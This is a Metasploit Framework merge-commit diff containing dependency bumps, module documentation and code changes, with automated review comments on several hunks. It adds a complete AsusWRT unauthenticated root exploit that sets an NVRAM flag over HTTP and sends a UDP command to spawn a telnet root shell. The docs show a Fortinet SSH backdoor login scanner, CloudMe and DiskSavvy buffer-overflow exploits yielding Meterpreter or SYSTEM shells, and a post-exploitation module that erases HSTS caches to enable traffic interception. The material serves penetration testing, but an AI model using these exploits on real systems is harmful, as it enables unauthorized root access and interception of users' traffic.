Merge branch 'master' into land-9607-

MS-2855/keylogger-mettle-extension
Brent Cook 2018-02-23 11:09:20 -06:00
commit cd728defed
36 changed files with 869 additions and 100 deletions


@ -59,7 +59,7 @@ PATH
rex-text
rex-zip
ruby-macho
ruby_smb
ruby_smb (= 0.0.18)
rubyntlm
rubyzip
sqlite3
@ -125,11 +125,11 @@ GEM
railties (>= 3.0.0)
faker (1.8.7)
i18n (>= 0.7)
faraday (0.13.1)
faraday (0.14.0)
multipart-post (>= 1.2, < 3)
filesize (0.1.1)
fivemat (1.3.5)
google-protobuf (3.5.1)
google-protobuf (3.5.1.2)
googleapis-common-protos-types (1.0.1)
google-protobuf (~> 3.0)
googleauth (0.6.2)
@ -140,12 +140,12 @@ GEM
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.8.3)
grpc (1.9.1)
google-protobuf (~> 3.1)
googleapis-common-protos-types (~> 1.0.0)
googleauth (>= 0.5.1, < 0.7)
hashery (2.1.2)
i18n (0.9.1)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jsobfu (0.4.2)
rkelly-remix
@ -155,7 +155,7 @@ GEM
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.1.1)
loofah (2.2.0)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
memoist (0.16.0)
@ -167,7 +167,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-credential (2.0.12)
metasploit-credential (2.0.13)
metasploit-concern
metasploit-model
metasploit_data_models
@ -194,7 +194,7 @@ GEM
metasploit_payloads-mettle (0.3.7)
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.11.1)
minitest (5.11.3)
mqtt (0.5.0)
msgpack (1.2.2)
multi_json (1.13.1)
@ -203,7 +203,7 @@ GEM
net-ssh (4.2.0)
network_interface (0.0.2)
nexpose (7.2.0)
nokogiri (1.8.1)
nokogiri (1.8.2)
mini_portile2 (~> 2.3.0)
octokit (4.8.0)
sawyer (~> 0.8.0, >= 0.5.3)
@ -214,7 +214,7 @@ GEM
pcaprub
patch_finder (1.0.2)
pcaprub (0.12.4)
pdf-reader (2.0.0)
pdf-reader (2.1.0)
Ascii85 (~> 1.0.0)
afm (~> 0.2.1)
hashery (~> 2.0)
@ -229,7 +229,7 @@ GEM
pry (0.11.3)
coderay (~> 1.1.0)
method_source (~> 0.9.0)
public_suffix (3.0.1)
public_suffix (3.0.2)
rack (1.6.8)
rack-test (0.6.3)
rack (>= 1.0)
@ -320,7 +320,7 @@ GEM
rspec-support (~> 3.7.0)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.7.0)
rspec-support (3.7.1)
ruby-macho (1.1.0)
ruby-rc4 (0.1.5)
ruby_smb (0.0.18)
@ -348,7 +348,7 @@ GEM
thread_safe (0.3.6)
timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.4)
tzinfo (1.2.5)
thread_safe (~> 0.1)
tzinfo-data (1.2018.3)
tzinfo (>= 1.0.0)


@ -0,0 +1,63 @@
## Intro
This module scans for the Fortinet SSH backdoor and creates sessions.
## Setup
1. `git clone https://github.com/nixawk/labs`
2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware
3. <http://help.fortinet.com/fweb/580/Content/FortiWeb/fortiweb-admin/network_settings.htm>
## Usage
```
msf5 > use auxiliary/scanner/ssh/fortinet_backdoor
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24
rhosts => 192.168.212.0/24
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100
threads => 100
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run
[*] Scanned 54 of 256 hosts (21% complete)
[+] 192.168.212.128:22 - Logged in as Fortimanager_Access
[*] Scanned 65 of 256 hosts (25% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 141 of 256 hosts (55% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 240 of 256 hosts (93% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1
[*] Starting interaction with 1...
FortiGate-VM # get system status
Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
Extreme DB: 1.00000(2012-10-17 15:47)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2000-00-00 00:00)
Serial-Number: FGVM00UNLICENSED
Botnet DB: 1.00000(2012-05-28 22:51)
License Status: Evaluation license expired
Evaluation License Expires: Thu Jan 28 13:05:41 2016
BIOS version: 04000002
Log hard disk: Need format
Hostname: FortiGate-VM
Operation Mode: NAT
Current virtual domain: root
Max number of virtual domains: 10
Virtual domains status: 1 in NAT mode, 0 in TP mode
Virtual domain configuration: disable
FIPS-CC mode: disable
Current HA mode: standalone
Branch point: 228
Release Version Information: GA Patch 4
System time: Wed Feb 21 13:13:43 2018
FortiGate-VM #
```


@ -0,0 +1,70 @@
## Description
This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`.
## Vulnerable Application
The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode.
This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user.
This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.
Numerous ASUS models are reportedly affected, but untested.
## Verification Steps
1. Start `msfconsole`
2. `use exploits/linux/http/asuswrt_lan_rce`
3. `set RHOST [IP]`
4. `run`
5. You should get a *root* session
## Options
**ASUSWRTPORT**
AsusWRT HTTP portal port (default: `80`)
## Scenarios
msf > use exploit/linux/http/asuswrt_lan_rce
msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205
rhost => 192.168.132.205
msf exploit(linux/http/asuswrt_lan_rce) > run
[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable.
[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332
[+] 192.168.132.205:9999 - Success, shell incoming!
[*] Found shell.
[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600
id
id
/bin/sh: id: not found
/ # cat /proc/cpuinfo
cat /proc/cpuinfo
system type : Broadcom BCM53572 chip rev 1 pkg 8
processor : 0
cpu model : MIPS 74K V4.9
BogoMIPS : 149.91
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : no
hardware watchpoint : yes
ASEs implemented : mips16 dsp
shadow register sets : 1
VCED exceptions : not available
VCEI exceptions : not available
unaligned_instructions : 0
dcache hits : 2147483648
dcache misses : 0
icache hits : 2147483648
icache misses : 0
instructions : 2147483648
/ #


@ -0,0 +1,41 @@
## Description
This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe).
## Verification Steps
1. Install CloudMe for Desktop version `v1.10.9`
2. Start the applicaton (you don't need to create an account)
3. Start `msfconsole`
4. Do `use exploit/windows/misc/cloudme_sync`
5. Do `set RHOST ip`
6. Do `set LHOST ip`
7. Do `exploit`
8. Verify the Meterpreter session is opened
## Scenarios
### CloudMe Sync client application on Windows 7 SP1 x86
```
msf > use exploit/windows/misc/cloudme_sync
msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
RHOST => 172.16.40.148
msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/misc/cloudme_sync) > exploit
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (179779 bytes) to 172.16.40.148
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
meterpreter > sysinfo
Computer : PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```


@ -0,0 +1,39 @@
## Vulnerable Application
[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).
## Verification Steps
1. Install a vulnerable DiskSavvy Enterprise
2. Start `msfconsole`
3. Do `use exploit/windows/misc/disk_savvy_adm`
4. Do `set RHOST ip`
5. Do `set PAYLOAD windows/shell/bind_tcp`
6. Do `exploit`
7. Enjoy your shell
## Scenarios
### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86
```
msf > use exploit/windows/misc/disk_savvy_adm
msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
RHOST => 192.168.216.55
msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(windows/misc/disk_savvy_adm) > exploit
[*] Started bind handler
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.216.55
[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
```


@ -0,0 +1,62 @@
This module allows you to erase the [HTTP Strict-Transport-Security](https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security) cache of a target machine. When combined with a sniffer or a man-in-the-middle tool, this module will assist with the capture/modification of TLS-encrypted traffic.
**WARNING:** This module _erases_ the HSTS cache, leaving the target in a vulnerable state. All browser traffic from all users on the target will be subject to man-in-the-middle attacks. There is no undo built-into this module. If you intend to revert, you must first backup the HSTS file before running the module.
Note: This module searches for all non-root users on the system. It will not erase HSTS data for the root user.
## Vulnerable Application
The following platforms are supported:
* Windows
* Linux
* OS X
## Verification Steps
1. Obtain and background a session from the target machine.
2. From the `msf>` prompt, do ```use post/multi/manage/hsts_eraser```
3. Set the ```DISCLAIMER``` option to ```True``` (after reading the above **WARNING**)
4. Set the ```SESSION``` option
5. ```run```
Alternatively:
1. Obtain a session from the target machine.
2. From the `meterpreter>` prompt, do ```run post/multi/manage/hsts_eraser DISCLAIMER=True```
## Demo
Set up a Kali VM with some HSTS data:
```bash
root@kali-2017:~# adduser bob
root@kali-2017:~# su bob
bob@kali-2017:/root$ cd
bob@kali-2017:~$ wget -S https://outlook.live.com/owa/ 2>&1 | grep -i strict
Strict-Transport-Security: max-age=31536000; includeSubDomains
Strict-Transport-Security: max-age=31536000; includeSubDomains
bob@kali-2017:~$ cat .wget-hsts
# HSTS 1.0 Known Hosts database for GNU Wget.
# Edit at your own risk.
# <hostname> <port> <incl. subdomains> <created> <max-age>
outlook.live.com 0 1 1519176414 31536000
```
Create an `msfvenom` payload, execute it, and then connect to it with `multi/exploit/handler`. From the Meterpreter session on the victim:
```
[*] Meterpreter session 1 opened (127.0.0.1:38089 -> 127.0.0.1:44444) at 2018-02-20 19:19:02 -0600
meterpreter > run post/multi/manage/hsts_eraser DISCLAIMER=True
[*] Removing wget HSTS database for bob...
[*] HSTS databases removed! Now enjoy your favorite sniffer! ;-)
```
Confirm that the file was deleted:
```bash
bob@kali-2017:~$ cat .wget-hsts
cat: .wget-hsts: No such file or directory
```


@ -1,5 +1,6 @@
# -*- coding: binary -*-
# https://www.ietf.org/rfc/rfc4252.txt
# https://www.ietf.org/rfc/rfc4256.txt
require 'net/ssh'
@ -11,7 +12,33 @@ module Msf::Exploit::Remote::Fortinet
USERAUTH_INFO_RESPONSE = 61
def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' }
send_message(userauth_request(
=begin
string user name
string service name
string "password"
boolean FALSE
string plaintext password in ISO-10646 UTF-8 encoding [RFC3629]
=end
username,
service_name,
'password',
false,
password || ''
))
loop do
message = session.next_message
case message.type
when USERAUTH_SUCCESS
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
return true
when USERAUTH_FAILURE
debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }
send_message(userauth_request(
=begin
@ -27,17 +54,6 @@ module Msf::Exploit::Remote::Fortinet
'',
''
))
loop do
message = session.next_message
case message.type
when USERAUTH_SUCCESS
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
return true
when USERAUTH_FAILURE
debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
return false
when USERAUTH_INFO_REQUEST
debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
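Review bot: After the password attempt fails, the `when USERAUTH_FAILURE` branch re-sends the keyboard-interactive request unconditionally, and the inner loop that used to `return false` on a second failure is removed by this commit; if the server also rejects the keyboard-interactive attempt the same branch fires again, so the method appears to loop until the server drops the connection (the rest of the `case` is outside the hunk, so a guard may exist there). A one-shot flag bounds it: `kbdint_sent = false` before the `loop`, and in the failure branch `return false if kbdint_sent` followed by `kbdint_sent = true` ahead of `send_message`. `authenticate` continues past the end of the hunk.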


@ -29,7 +29,7 @@ def report_vuln(ip, name, **opts):
def run(metadata, module_callback):
req = json.loads(os.read(0, 10000))
req = json.loads(os.read(0, 10000).decode("utf-8"))
if req['method'] == 'describe':
rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})
elif req['method'] == 'run':
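Review bot: The request is still read with a single `os.read(0, 10000)`, so a request larger than 10000 bytes, or one delivered in more than one chunk, is truncated and `json.loads` raises; the added `.decode("utf-8")` additionally raises `UnicodeDecodeError` if the cut lands inside a multi-byte sequence. If the framework always writes the whole request in one write and requests stay small this is acceptable, but the cap deserves a comment on that line: `# single fixed-size read: a request over 10000 bytes is truncated and json.loads fails`. A read loop that accumulates chunks until the JSON parses would remove the limit. `run` continues outside the hunk.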


@ -15,7 +15,34 @@ class CommandStream
attr_accessor :localinfo
end
def initialize(ssh, cmd, cleanup = false)
def shell_requested(channel, success)
raise "could not request ssh shell" unless success
channel[:data] = ''
channel.on_eof do
self.rsock.close rescue nil
self.ssh.close rescue nil
self.thread.kill
end
channel.on_close do
self.rsock.close rescue nil
self.ssh.close rescue nil
self.thread.kill
end
channel.on_data do |ch,data|
self.rsock.write(data)
end
channel.on_extended_data do |ch, ctype, data|
self.rsock.write(data)
end
self.channel = channel
end
def initialize(ssh, cmd = nil, cleanup = true)
self.lsock, self.rsock = Rex::Socket.tcp_socket_pair()
self.lsock.extend(Rex::IO::Stream)
@ -23,7 +50,7 @@ class CommandStream
self.rsock.extend(Rex::IO::Stream)
self.ssh = ssh
self.thread = Thread.new(ssh,cmd,cleanup) do |rssh,rcmd,rcleanup|
self.thread = Thread.new(ssh,cmd,cleanup) do |rssh, rcmd, rcleanup|
begin
info = rssh.transport.socket.getpeername_as_array
@ -33,32 +60,10 @@ class CommandStream
self.lsock.localinfo = "#{info[1]}:#{info[2]}"
rssh.open_channel do |rch|
rch.exec(rcmd) do |c, success|
raise "could not execute command: #{rcmd.inspect}" unless success
c[:data] = ''
c.on_eof do
self.rsock.close rescue nil
self.ssh.close rescue nil
self.thread.kill
end
c.on_close do
self.rsock.close rescue nil
self.ssh.close rescue nil
self.thread.kill
end
c.on_data do |ch,data|
self.rsock.write(data)
end
c.on_extended_data do |ch, ctype, data|
self.rsock.write(data)
end
self.channel = c
if cmd.nil?
rch.send_channel_request("shell", &method(:shell_requested))
else
rch.exec(rsh, &method(:shell_requested))
end
end
@ -85,7 +90,7 @@ class CommandStream
end
# Shut down the SSH session if requested
if(rcleanup)
if rcleanup
rssh.close
end
end
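Review bot: `rch.exec(rsh, &method(:shell_requested))` references `rsh`, which is not defined anywhere in the hunk — the block parameter is `rcmd` (and the outer `cmd`) — so every call that passes a command raises `NameError` inside the stream thread; the call sites further down this page that still pass a command (`'shell-escape'`, `build_command`) take exactly this branch. The line should read `rch.exec(rcmd, &method(:shell_requested))`, and the condition above it is more consistent as `if rcmd.nil?`. `shell_requested` also raises the same `could not request ssh shell` message for both paths, so an exec failure no longer says which command failed, whereas the removed line included `rcmd.inspect`. Changing the `cleanup` default from `false` to `true` silently changes behaviour for any caller that omitted the argument; a line in a comment above `initialize` should say so. The enclosing `initialize` continues outside the hunk.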


@ -127,7 +127,7 @@ Gem::Specification.new do |spec|
spec.add_runtime_dependency 'mqtt'
spec.add_runtime_dependency 'net-ssh'
spec.add_runtime_dependency 'bcrypt_pbkdf'
spec.add_runtime_dependency 'ruby_smb'
spec.add_runtime_dependency 'ruby_smb', '0.0.18'
#
# REX Libraries


@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
finger_zero
finger_dot
finger_chars
vprint_status "#{rhost}:#{rport} - Sending finger request for user list: #{finger_user_common.join(", ")}"
vprint_status "#{rhost}:#{rport} - Sending finger request for #{finger_user_common.count} users"
finger_list
rescue ::Rex::ConnectionError
@ -168,22 +168,21 @@ class MetasploitModule < Msf::Auxiliary
# No such file or directory == valid user bad utmp
case line
when /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/
# Solaris
if(line =~ /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/)
uid = $1
if ($2 != "Name")
@users[uid] ||= {}
end
end
when /^\s*Login name:\s*([^\s]+)\s+/i
# IRIX
if(line =~ /^\s*Login name:\s*([^\s]+)\s+/i)
uid = $1
@users[uid] ||= {} if uid
end
when /^\s*(?:Username|Login):\s*([^\s]+)\s+/i
# Debian GNU/Linux
if(line =~ /^\s*Username:\s*([^\s]+)\s+/i)
uid = $1
@users[uid] ||= {} if uid
end
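Review bot: The new `when /…/` arms still pull the capture out of `$1`, which is easy to lose if another regexp runs between the match and the read; `uid = Regexp.last_match(1)`, or a named group such as `(?<uid>[a-z0-9\.\_]+)` read via `Regexp.last_match[:uid]`, makes the dependency explicit. The `@users[uid] ||= {} if uid` guards look redundant inside a `when` whose group is `[^\s]+` and therefore always captures at least one character when the arm matches. The `case` continues outside the hunk.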


@ -232,7 +232,7 @@ class MetasploitModule < Msf::Auxiliary
# No password change required moving on.
# Check for valid login but no mailbox setup
print_good("server type: #{res.headers["X-FEServer"]}")
if res.headers['location'] =~ /owa/
if res.headers['location'] =~ /owa/ and res.headers['location'] !~ /reason/
print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}'")
report_cred(
ip: res.peerinfo['addr'],
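Review bot: The new condition joins the two matches with `and`, which binds looser than `=~`/`!~` and than assignment; it is harmless inside this `if`, but `&&` is the idiomatic form and avoids surprises if the expression is ever assigned: `if res.headers['location'] =~ /owa/ && res.headers['location'] !~ /reason/`. Reading the header once into a local (`location = res.headers['location']`) would also avoid the double lookup. The enclosing method continues outside the hunk.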


@ -3,10 +3,14 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
# XXX: This shouldn't be necessary but is now
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SSH
include Msf::Exploit::Remote::Fortinet
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::CommandShell
include Msf::Auxiliary::Report
def initialize(info = {})
@ -45,6 +49,8 @@ class MetasploitModule < Msf::Auxiliary
ssh_opts = {
port: rport,
# The auth method is converted into a class name for instantiation,
# so fortinet-backdoor here becomes FortinetBackdoor from the mixin
auth_methods: ['fortinet-backdoor'],
non_interactive: true,
config: false,
@ -63,15 +69,33 @@ class MetasploitModule < Msf::Auxiliary
return
end
if ssh
return unless ssh
print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
version = ssh.transport.server_version.version
report_vuln(
host: ip,
name: self.name,
refs: self.references,
info: ssh.transport.server_version.version
info: version
)
end
shell = Net::SSH::CommandStream.new(ssh)
return unless shell
info = "Fortinet SSH Backdoor (#{version})"
ds_merge = {
'USERNAME' => 'Fortimanager_Access'
}
start_session(self, info, ds_merge, false, shell.lsock)
# XXX: Ruby segfaults if we don't remove the SSH socket
remove_socket(ssh.transport.socket)
end
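Review bot: `return unless shell` on the line after `Net::SSH::CommandStream.new(ssh)` can never trigger — `new` returns an instance or raises, and a failed channel request surfaces inside the stream's own thread rather than here — so the guard gives a false sense of error handling; drop it, or rescue around the `start_session` call if a failure path is actually expected. The `# XXX: Ruby segfaults if we don't remove the SSH socket` comment would be more useful if it recorded the Ruby and net-ssh versions where this was observed, so a later maintainer can tell whether it still applies. The enclosing method continues outside the hunk.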
def rport


@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
return unless ssh_socket
# Create a new session
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
merge_me = {
'USERPASS_FILE' => nil,


@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary
return unless ssh_socket
# Create a new session from the socket
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
# Clean up the stored data - need to stash the keyfile into
# a datastore for later reuse.


@ -9,9 +9,13 @@ import os
import ssl
# extra modules
import gmpy2
from cryptography import x509
from cryptography.hazmat.backends import default_backend
dependencies_missing = False
try:
import gmpy2
from cryptography import x509
from cryptography.hazmat.backends import default_backend
except ImportError:
dependencies_missing = True
from metasploit import module
@ -151,6 +155,10 @@ def oracle(target, pms, cke_2nd_prefix, cipher_handshake=ch_def, messageflow=Fal
def run(args):
if dependencies_missing:
module.log("Module dependencies (gmpy2 and cryptography python libraries) missing, cannot continue", level='error')
return
target = (args['rhost'], int(args['rport']))
timeout = float(args['timeout'])
cipher_handshake = cipher_handshakes[args['cipher_group']]
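Review bot: The `except ImportError` at the top of the file discards which of the three imports failed, so the error logged in `run` can only name "gmpy2 and cryptography" collectively; keeping the exception makes the message actionable: `except ImportError as e:` / `dependencies_missing = e`, and in `run` `module.log("Module dependency missing ({}), cannot continue".format(dependencies_missing), level='error')`. `run` continues outside the hunk.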


@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
if ssh
conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh)
ssh = nil
return conn
end


@ -0,0 +1,132 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution',
'Description' => %q{
The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to
perform a POST in certain cases. This can be combined with another vulnerability in
the VPN configuration upload routine that sets NVRAM configuration variables directly
from the POST request to enable a special command mode.
This command mode can then be abused by sending a UDP packet to infosvr, which is running
on port UDP 9999 to directly execute commands as root.
This exploit leverages that to start telnetd in a random port, and then connects to it.
It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],
['CVE', '2018-5999'],
['CVE', '2018-6000']
],
'Targets' =>
[
[ 'AsusWRT < v3.0.0.4.384.10007',
{
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
}
],
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DisclosureDate' => 'Jan 22 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9999)
])
register_advanced_options(
[
OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80])
])
end
def exploit
# first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD
# this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!
post_data = Rex::MIME::Message.new
post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => "/vpnupload.cgi",
'method' => 'POST',
'rport' => datastore['ASUSWRTPORT'],
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if res and res.code == 200
print_good("#{peer} - Successfully set the ateCommand_flag variable.")
else
fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.")
end
# ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.
info_pdu_size = 512 # expected packet size, not sure what the extra bytes are
r = Random.new
ibox_comm_pkt_hdr_ex =
[0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC
[0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15
[0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33
r.bytes(4) + # Info, don't know what this is
r.bytes(6) + # MAC address
r.bytes(32) # Password
telnet_port = rand((2**16)-1024)+1024
cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*')
pkt_syscmd =
[cmd.length,0x00].pack('C*') + # cmd length
cmd # our command
pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length)
connect_udp
udp_sock.put(pkt_final) # we could process the response, but we don't care
disconnect_udp
print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}")
sleep(10)
begin
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 })
if not sock.nil?
print_good("#{peer} - Success, shell incoming!")
return handler(sock)
end
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
sock.close if sock
end
print_bad("#{peer} - Well that didn't work... try again?")
end
end
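Review bot: `post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "…")` is not keyword syntax — Ruby evaluates the three `=` as assignments to throw-away locals and passes the values positionally — so the names mislead the reader and leak unused locals; write the positional call plainly, `post_data.add_part('1', nil, nil, 'form-data; name="ateCommand_flag"')`. Elsewhere in `exploit`, `if res and res.code == 200` and `if not sock.nil?` are better written `if res && res.code == 200` and `if sock`, and the rescued exception bound as `e` is never used. The fixed `sleep(10)` and the matching `'Timeout' => 10` would read better as one named constant or a registered option so the two values cannot drift apart.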


@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
return conn


@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
return conn


@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
return false unless ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
conn
end


@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
return conn


@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
return conn


@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
if ssh
conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', true)
conn = Net::SSH::CommandStream.new(ssh, 'shell-escape')
return conn
end


@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
if ssh
conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh)
ssh = nil
return conn
end


